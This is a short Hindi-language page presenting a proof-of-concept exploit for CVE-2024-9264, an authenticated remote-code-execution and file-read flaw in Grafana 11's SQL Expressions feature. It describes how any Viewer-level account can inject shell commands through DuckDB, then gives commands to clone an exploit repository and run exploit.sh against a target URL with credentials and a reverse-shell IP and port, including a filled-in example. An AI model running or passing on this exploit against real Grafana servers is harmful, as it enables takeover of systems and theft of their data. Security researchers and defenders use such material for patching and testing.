
Grafana (v11.0) में SQL Expressions के माध्यम से प्रमाणित RCE - PoC Exploit
Grafana (v11.0) में SQL Expressions के माध्यम से प्रमाणित RCE - PoC Exploit
CVE-2024-9264 - Grafana v11.0
प्रमाणित दूरस्थ कोड निष्पादन (RCE)
PoC
CVE-2024-9264 एक गंभीर remote-code-execution और local-file-inclusion दोष है जो Grafana 11 के प्रायोगिक “SQL Expressions” सुविधा में पेश किया गया है। API उपयोगकर्ता द्वारा प्रदान किए गए SQL को बिना पर्याप्त स्वच्छता के सीधे DuckDB CLI को भेजता है, इसलिए Viewer या उच्च अधिकार वाला कोई भी प्रमाणित खाता शेल कमांड इंजेक्ट कर सकता है या मनमानी फ़ाइलें पढ़ सकता है, बशर्ते duckdb बाइनरी सर्वर के PATH में हो।
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
उदाहरण:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337